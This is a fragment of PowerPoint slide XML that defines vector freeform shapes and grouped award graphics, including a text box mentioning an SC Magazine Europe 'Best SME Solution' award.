                      <a:cubicBezTo>
                        <a:pt x="622" y="247"/>
                        <a:pt x="625" y="247"/>
                        <a:pt x="628" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="630" y="247"/>
                        <a:pt x="633" y="247"/>
                        <a:pt x="635" y="247"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="635" y="2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18" name="Freeform 73">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95235B65-2914-DC49-820C-9634131AB7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197824" y="24303061"/>
                  <a:ext cx="66675" cy="88900"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 16 w 16"/>
                    <a:gd name="T1" fmla="*/ 4 h 21"/>
                    <a:gd name="T2" fmla="*/ 16 w 16"/>
                    <a:gd name="T3" fmla="*/ 3 h 21"/>
                    <a:gd name="T4" fmla="*/ 13 w 16"/>
                    <a:gd name="T5" fmla="*/ 0 h 21"/>
                    <a:gd name="T6" fmla="*/ 0 w 16"/>
                    <a:gd name="T7" fmla="*/ 18 h 21"/>
                    <a:gd name="T8" fmla="*/ 0 w 16"/>
                    <a:gd name="T9" fmla="*/ 21 h 21"/>
                    <a:gd name="T10" fmla="*/ 8 w 16"/>
                    <a:gd name="T11" fmla="*/ 12 h 21"/>
                    <a:gd name="T12" fmla="*/ 16 w 16"/>
                    <a:gd name="T13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21">
                      <a:moveTo>
                        <a:pt x="16" y="4"/>
                      </a:move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1"/>
                        <a:pt x="14" y="0"/>
                        <a:pt x="13" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="0"/>
                        <a:pt x="0" y="10"/>
                        <a:pt x="0" y="18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3" y="18"/>
                        <a:pt x="5" y="15"/>
                        <a:pt x="8" y="12"/>
                      </a:cubicBez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19" name="Freeform 74">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B01BBEFF-4E80-E449-BB57-47B66BA22B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269262" y="23917299"/>
                  <a:ext cx="134938" cy="177800"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 17 w 32"/>
                    <a:gd name="T1" fmla="*/ 42 h 42"/>
                    <a:gd name="T2" fmla="*/ 32 w 32"/>
                    <a:gd name="T3" fmla="*/ 23 h 42"/>
                    <a:gd name="T4" fmla="*/ 15 w 32"/>
                    <a:gd name="T5" fmla="*/ 0 h 42"/>
                    <a:gd name="T6" fmla="*/ 0 w 32"/>
                    <a:gd name="T7" fmla="*/ 20 h 42"/>
                    <a:gd name="T8" fmla="*/ 17 w 32"/>
                    <a:gd name="T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" h="42">
                      <a:moveTo>
                        <a:pt x="17" y="42"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="42"/>
                        <a:pt x="32" y="34"/>
                        <a:pt x="32" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="13"/>
                        <a:pt x="27" y="0"/>
                        <a:pt x="15" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="0" y="8"/>
                        <a:pt x="0" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="29"/>
                        <a:pt x="5" y="42"/>
                        <a:pt x="17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</p:grp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E7556BBC-4AB6-4649-8196-ED4F6730475E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3236038" y="5671084"/>
              <a:ext cx="764796" cy="616732"/>
              <a:chOff x="4883444" y="5671084"/>
              <a:chExt cx="764796" cy="616732"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="221" name="Shape 117">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D728291-D502-F742-AECC-15ED75358AF9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4883444" y="6103150"/>
                <a:ext cx="764796" cy="1846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SC Magazine Europe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Best SME Solution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  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="222" name="그룹 57">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50EA5DE8-A056-6E47-9AE0-7E9B3FA45368}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5083348" y="5671084"/>
                <a:ext cx="365031" cy="296727"/>
                <a:chOff x="11317224" y="18010211"/>
                <a:chExt cx="2316163" cy="188277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23" name="Freeform 75">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74401B17-4650-704F-9CBC-53D5F40A52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88787" y="19680261"/>
                  <a:ext cx="76200" cy="96838"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 48"/>
                    <a:gd name="T1" fmla="*/ 61 h 61"/>
                    <a:gd name="T2" fmla="*/ 48 w 48"/>
                    <a:gd name="T3" fmla="*/ 61 h 61"/>
                    <a:gd name="T4" fmla="*/ 24 w 48"/>
                    <a:gd name="T5" fmla="*/ 0 h 61"/>
                    <a:gd name="T6" fmla="*/ 0 w 48"/>
                    <a:gd name="T7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8" h="61">
                      <a:moveTo>
                        <a:pt x="0" y="61"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="48" y="61"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24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24" name="Freeform 76">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1518953D-D213-054E-A25C-58733246CA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802999" y="19680261"/>
                  <a:ext cx="80963" cy="96838"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 51"/>
                    <a:gd name="T1" fmla="*/ 61 h 61"/>
                    <a:gd name="T2" fmla="*/ 51 w 51"/>
                    <a:gd name="T3" fmla="*/ 61 h 61"/>
                    <a:gd name="T4" fmla="*/ 24 w 51"/>
                    <a:gd name="T5" fmla="*/ 0 h 61"/>
                    <a:gd name="T6" fmla="*/ 0 w 51"/>
                    <a:gd name="T7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1" h="61">
                      <a:moveTo>
                        <a:pt x="0" y="61"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="51" y="61"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0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25" name="Freeform 77">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8820C477-847B-CB47-A810-17B632E2BFF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317224" y="18010211"/>
                  <a:ext cx="2316163" cy="1882775"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 284 w 547"/>
                    <a:gd name="T1" fmla="*/ 264 h 444"/>
                    <a:gd name="T2" fmla="*/ 390 w 547"/>
                    <a:gd name="T3" fmla="*/ 0 h 444"/>
                    <a:gd name="T4" fmla="*/ 260 w 547"/>
                    <a:gd name="T5" fmla="*/ 119 h 444"/>
                    <a:gd name="T6" fmla="*/ 129 w 547"/>
                    <a:gd name="T7" fmla="*/ 61 h 444"/>
                    <a:gd name="T8" fmla="*/ 155 w 547"/>
                    <a:gd name="T9" fmla="*/ 152 h 444"/>
                    <a:gd name="T10" fmla="*/ 129 w 547"/>
                    <a:gd name="T11" fmla="*/ 371 h 444"/>
                    <a:gd name="T12" fmla="*/ 0 w 547"/>
                    <a:gd name="T13" fmla="*/ 444 h 444"/>
                    <a:gd name="T14" fmla="*/ 547 w 547"/>
                    <a:gd name="T15" fmla="*/ 306 h 444"/>
                    <a:gd name="T16" fmla="*/ 70 w 547"/>
                    <a:gd name="T17" fmla="*/ 431 h 444"/>
                    <a:gd name="T18" fmla="*/ 65 w 547"/>
                    <a:gd name="T19" fmla="*/ 395 h 444"/>
                    <a:gd name="T20" fmla="*/ 34 w 547"/>
                    <a:gd name="T21" fmla="*/ 395 h 444"/>
                    <a:gd name="T22" fmla="*/ 29 w 547"/>
                    <a:gd name="T23" fmla="*/ 431 h 444"/>
                    <a:gd name="T24" fmla="*/ 50 w 547"/>
                    <a:gd name="T25" fmla="*/ 408 h 444"/>
                    <a:gd name="T26" fmla="*/ 70 w 547"/>
                    <a:gd name="T27" fmla="*/ 431 h 444"/>
                    <a:gd name="T28" fmla="*/ 135 w 547"/>
                    <a:gd name="T29" fmla="*/ 422 h 444"/>
                    <a:gd name="T30" fmla="*/ 110 w 547"/>
                    <a:gd name="T31" fmla="*/ 430 h 444"/>
                    <a:gd name="T32" fmla="*/ 124 w 547"/>
                    <a:gd name="T33" fmla="*/ 382 h 444"/>
                    <a:gd name="T34" fmla="*/ 139 w 547"/>
                    <a:gd name="T35" fmla="*/ 430 h 444"/>
                    <a:gd name="T36" fmla="*/ 205 w 547"/>
                    <a:gd name="T37" fmla="*/ 422 h 444"/>
                    <a:gd name="T38" fmla="*/ 194 w 547"/>
                    <a:gd name="T39" fmla="*/ 415 h 444"/>
                    <a:gd name="T40" fmla="*/ 210 w 547"/>
                    <a:gd name="T41" fmla="*/ 410 h 444"/>
                    <a:gd name="T42" fmla="*/ 209 w 547"/>
                    <a:gd name="T43" fmla="*/ 424 h 444"/>
                    <a:gd name="T44" fmla="*/ 173 w 547"/>
                    <a:gd name="T45" fmla="*/ 409 h 444"/>
                    <a:gd name="T46" fmla="*/ 209 w 547"/>
                    <a:gd name="T47" fmla="*/ 393 h 444"/>
                    <a:gd name="T48" fmla="*/ 207 w 547"/>
                    <a:gd name="T49" fmla="*/ 398 h 444"/>
                    <a:gd name="T50" fmla="*/ 188 w 547"/>
                    <a:gd name="T51" fmla="*/ 391 h 444"/>
                    <a:gd name="T52" fmla="*/ 191 w 547"/>
                    <a:gd name="T53" fmla="*/ 426 h 444"/>
                    <a:gd name="T54" fmla="*/ 273 w 547"/>
                    <a:gd name="T55" fmla="*/ 422 h 444"/>
                    <a:gd name="T56" fmla="*/ 247 w 547"/>
                    <a:gd name="T57" fmla="*/ 430 h 444"/>
                    <a:gd name="T58" fmla="*/ 262 w 547"/>
                    <a:gd name="T59" fmla="*/ 382 h 444"/>
                    <a:gd name="T60" fmla="*/ 276 w 547"/>
                    <a:gd name="T61" fmla="*/ 430 h 444"/>
                    <a:gd name="T62" fmla="*/ 341 w 547"/>
                    <a:gd name="T63" fmla="*/ 431 h 444"/>
                    <a:gd name="T64" fmla="*/ 335 w 547"/>
                    <a:gd name="T65" fmla="*/ 391 h 444"/>
                    <a:gd name="T66" fmla="*/ 313 w 547"/>
                    <a:gd name="T67" fmla="*/ 386 h 444"/>
                    <a:gd name="T68" fmla="*/ 320 w 547"/>
                    <a:gd name="T69" fmla="*/ 426 h 444"/>
                    <a:gd name="T70" fmla="*/ 384 w 547"/>
                    <a:gd name="T71" fmla="*/ 431 h 444"/>
                    <a:gd name="T72" fmla="*/ 379 w 547"/>
                    <a:gd name="T73" fmla="*/ 386 h 444"/>
                    <a:gd name="T74" fmla="*/ 384 w 547"/>
                    <a:gd name="T75" fmla="*/ 431 h 444"/>
                    <a:gd name="T76" fmla="*/ 425 w 547"/>
                    <a:gd name="T77" fmla="*/ 397 h 444"/>
                    <a:gd name="T78" fmla="*/ 421 w 547"/>
                    <a:gd name="T79" fmla="*/ 431 h 444"/>
                    <a:gd name="T80" fmla="*/ 451 w 547"/>
                    <a:gd name="T81" fmla="*/ 419 h 444"/>
                    <a:gd name="T82" fmla="*/ 455 w 547"/>
                    <a:gd name="T83" fmla="*/ 385 h 444"/>
                    <a:gd name="T84" fmla="*/ 522 w 547"/>
                    <a:gd name="T85" fmla="*/ 391 h 444"/>
                    <a:gd name="T86" fmla="*/ 498 w 547"/>
                    <a:gd name="T87" fmla="*/ 409 h 444"/>
                    <a:gd name="T88" fmla="*/ 517 w 547"/>
                    <a:gd name="T89" fmla="*/ 414 h 444"/>
                    <a:gd name="T90" fmla="*/ 498 w 547"/>
                    <a:gd name="T91" fmla="*/ 426 h 444"/>
                    <a:gd name="T92" fmla="*/ 522 w 547"/>
                    <a:gd name="T93" fmla="*/ 431 h 444"/>
                    <a:gd name="T94" fmla="*/ 493 w 547"/>
                    <a:gd name="T95" fmla="*/ 414 h 444"/>
                    <a:gd name="T96" fmla="*/ 493 w 547"/>
                    <a:gd name="T97" fmla="*/ 386 h 444"/>
                    <a:gd name="T98" fmla="*/ 522 w 547"/>
                    <a:gd name="T99" fmla="*/ 391 h 4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547" h="444">
                      <a:moveTo>
                        <a:pt x="423" y="371"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="289" y="371"/>
                        <a:pt x="284" y="264"/>
                        <a:pt x="284" y="264"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="284" y="264"/>
                        <a:pt x="284" y="134"/>
                        <a:pt x="284" y="107"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="284" y="83"/>
                        <a:pt x="302" y="14"/>
                        <a:pt x="390" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="161" y="0"/>
                        <a:pt x="161" y="0"/>
                        <a:pt x="161" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="17"/>
                        <a:pt x="260" y="119"/>
                        <a:pt x="260" y="119"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="177" y="119"/>
                        <a:pt x="177" y="119"/>
                        <a:pt x="177" y="119"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="177" y="119"/>
                        <a:pt x="179" y="59"/>
                        <a:pt x="129" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="78" y="63"/>
                        <a:pt x="77" y="93"/>
                        <a:pt x="77" y="93"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="93"/>
                        <a:pt x="63" y="128"/>
                        <a:pt x="155" y="152"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="247" y="175"/>
                        <a:pt x="261" y="239"/>
                        <a:pt x="261" y="239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="261" y="239"/>
                        <a:pt x="283" y="371"/>
                        <a:pt x="129" y="371"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="371"/>
                        <a:pt x="10" y="329"/>
                        <a:pt x="0" y="293"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="444"/>
                        <a:pt x="0" y="444"/>
                        <a:pt x="0" y="444"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="547" y="444"/>
                        <a:pt x="547" y="444"/>
                        <a:pt x="547" y="444"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="547" y="306"/>
                        <a:pt x="547" y="306"/>
                        <a:pt x="547" y="306"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="538" y="337"/>
                        <a:pt x="511" y="371"/>
                        <a:pt x="423" y="371"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="70" y="431"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="65" y="431"/>
                        <a:pt x="65" y="431"/>
                        <a:pt x="65" y="431"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="65" y="395"/>
                        <a:pt x="65" y="395"/>
                        <a:pt x="65" y="395"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="416"/>
                        <a:pt x="50" y="416"/>
                        <a:pt x="50" y="416"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="34" y="395"/>
                        <a:pt x="34" y="395"/>
                        <a:pt x="34" y="395"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="34" y="431"/>
                        <a:pt x="34" y="431"/>
                        <a:pt x="34" y="431"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="431"/>
                        <a:pt x="29" y="431"/>
                        <a:pt x="29" y="431"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="381"/>
                        <a:pt x="29" y="381"/>
                        <a:pt x="29" y="381"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="408"/>
                        <a:pt x="50" y="408"/>
                        <a:pt x="50" y="408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="70" y="381"/>
                        <a:pt x="70" y="381"/>
                        <a:pt x="70" y="381"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="70" y="431"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="139" y="430"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="422"/>
                        <a:pt x="135" y="422"/>
                        <a:pt x="135" y="422"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="113" y="422"/>
                        <a:pt x="113" y="422"/>
                        <a:pt x="113" y="422"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="430"/>
                        <a:pt x="110" y="430"/>
                        <a:pt x="110" y="430"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="430"/>
                        <a:pt x="105" y="430"/>
                        <a:pt x="105" y="430"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="382"/>
                        <a:pt x="124" y="382"/>
                        <a:pt x="124" y="382"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="430"/>
                        <a:pt x="144" y="430"/>
                        <a:pt x="144" y="430"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="139" y="430"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="191" y="426"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="200" y="426"/>
                        <a:pt x="204" y="423"/>
                        <a:pt x="205" y="422"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="415"/>
                        <a:pt x="205" y="415"/>
                        <a:pt x="205" y="415"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="415"/>
                        <a:pt x="194" y="415"/>
                        <a:pt x="194" y="415"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="410"/>
                        <a:pt x="194" y="410"/>
                        <a:pt x="194" y="410"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="210" y="410"/>
                        <a:pt x="210" y="410"/>
                        <a:pt x="210" y="410"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="210" y="423"/>
                        <a:pt x="210" y="423"/>
                        <a:pt x="210" y="423"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="209" y="424"/>
                        <a:pt x="209" y="424"/>
                        <a:pt x="209" y="424"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="209" y="424"/>
                        <a:pt x="205" y="431"/>
                        <a:pt x="191" y="431"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="431"/>
                        <a:pt x="173" y="419"/>
                        <a:pt x="173" y="409"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="173" y="399"/>
                        <a:pt x="175" y="390"/>
                        <a:pt x="187" y="386"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="200" y="382"/>
                        <a:pt x="209" y="392"/>
                        <a:pt x="209" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="210" y="395"/>
                        <a:pt x="210" y="395"/>
                        <a:pt x="210" y="395"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="398"/>
                        <a:pt x="207" y="398"/>
                        <a:pt x="207" y="398"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="396"/>
                        <a:pt x="205" y="396"/>
                        <a:pt x="205" y="396"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="395"/>
                        <a:pt x="198" y="387"/>
                        <a:pt x="188" y="391"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="394"/>
                        <a:pt x="178" y="400"/>
                        <a:pt x="178" y="409"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="412"/>
                        <a:pt x="179" y="426"/>
                        <a:pt x="191" y="426"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="276" y="430"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="273" y="422"/>
                        <a:pt x="273" y="422"/>
                        <a:pt x="273" y="422"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="251" y="422"/>
                        <a:pt x="251" y="422"/>
                        <a:pt x="251" y="422"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="247" y="430"/>
                        <a:pt x="247" y="430"/>
                        <a:pt x="247" y="430"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="242" y="430"/>
                        <a:pt x="242" y="430"/>
                        <a:pt x="242" y="430"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="262" y="382"/>
                        <a:pt x="262" y="382"/>
                        <a:pt x="262" y="382"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="281" y="430"/>
                        <a:pt x="281" y="430"/>
                        <a:pt x="281" y="430"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="276" y="430"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="341" y="426"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="341" y="431"/>
                        <a:pt x="341" y="431"/>
                        <a:pt x="341" y="431"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="312" y="431"/>
                        <a:pt x="312" y="431"/>
                        <a:pt x="312" y="431"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="335" y="391"/>
                        <a:pt x="335" y="391"/>
                        <a:pt x="335" y="391"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="313" y="391"/>
                        <a:pt x="313" y="391"/>
                        <a:pt x="313" y="391"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="313" y="386"/>
                        <a:pt x="313" y="386"/>
                        <a:pt x="313" y="386"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="343" y="386"/>
                        <a:pt x="343" y="386"/>
                        <a:pt x="343" y="386"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="320" y="426"/>
                        <a:pt x="320" y="426"/>
                        <a:pt x="320" y="426"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="341" y="426"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="384" y="431"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="379" y="431"/>
                        <a:pt x="379" y="431"/>
                        <a:pt x="379" y="431"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="379" y="386"/>
                        <a:pt x="379" y="386"/>
                        <a:pt x="379" y="386"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="384" y="386"/>
                        <a:pt x="384" y="386"/>
                        <a:pt x="384" y="386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="384" y="431"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="455" y="432"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="425" y="397"/>
                        <a:pt x="425" y="397"/>
                        <a:pt x="425" y="397"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="425" y="431"/>
                        <a:pt x="425" y="431"/>
                        <a:pt x="425" y="431"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="421" y="431"/>
                        <a:pt x="421" y="431"/>
                        <a:pt x="421" y="431"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="421" y="384"/>
                        <a:pt x="421" y="384"/>
                        <a:pt x="421" y="384"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="451" y="419"/>
                        <a:pt x="451" y="419"/>
                        <a:pt x="451" y="419"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="451" y="385"/>
                        <a:pt x="451" y="385"/>
                        <a:pt x="451" y="385"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="455" y="385"/>
                        <a:pt x="455" y="385"/>
                        <a:pt x="455" y="385"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="455" y="432"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="522" y="391"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="498" y="391"/>
                        <a:pt x="498" y="391"/>
                        <a:pt x="498" y="391"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="498" y="409"/>
                        <a:pt x="498" y="409"/>
                        <a:pt x="498" y="409"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="517" y="409"/>
                        <a:pt x="517" y="409"/>
                        <a:pt x="517" y="409"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="517" y="414"/>
                        <a:pt x="517" y="414"/>
                        <a:pt x="517" y="414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="498" y="414"/>
                        <a:pt x="498" y="414"/>
                        <a:pt x="498" y="414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="498" y="426"/>
                        <a:pt x="498" y="426"/>
                        <a:pt x="498" y="426"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="522" y="426"/>
                        <a:pt x="522" y="426"/>
                        <a:pt x="522" y="426"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="522" y="431"/>
                        <a:pt x="522" y="431"/>
                        <a:pt x="522" y="431"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="493" y="431"/>
                        <a:pt x="493" y="431"/>
                        <a:pt x="493" y="431"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="493" y="414"/>
                        <a:pt x="493" y="414"/>
                        <a:pt x="493" y="414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="493" y="409"/>
                        <a:pt x="493" y="409"/>
                        <a:pt x="493" y="409"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="493" y="386"/>
                        <a:pt x="493" y="386"/>
                        <a:pt x="493" y="386"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="522" y="386"/>
                        <a:pt x="522" y="386"/>
                        <a:pt x="522" y="386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="522" y="39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26" name="Freeform 78">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3AECAF-CD06-C240-9483-CA26F702D1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74562" y="18281674"/>
                  <a:ext cx="758825" cy="1012825"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 111 w 179"/>
                    <a:gd name="T1" fmla="*/ 37 h 239"/>
                    <a:gd name="T2" fmla="*/ 56 w 179"/>
                    <a:gd name="T3" fmla="*/ 0 h 239"/>
                    <a:gd name="T4" fmla="*/ 0 w 179"/>
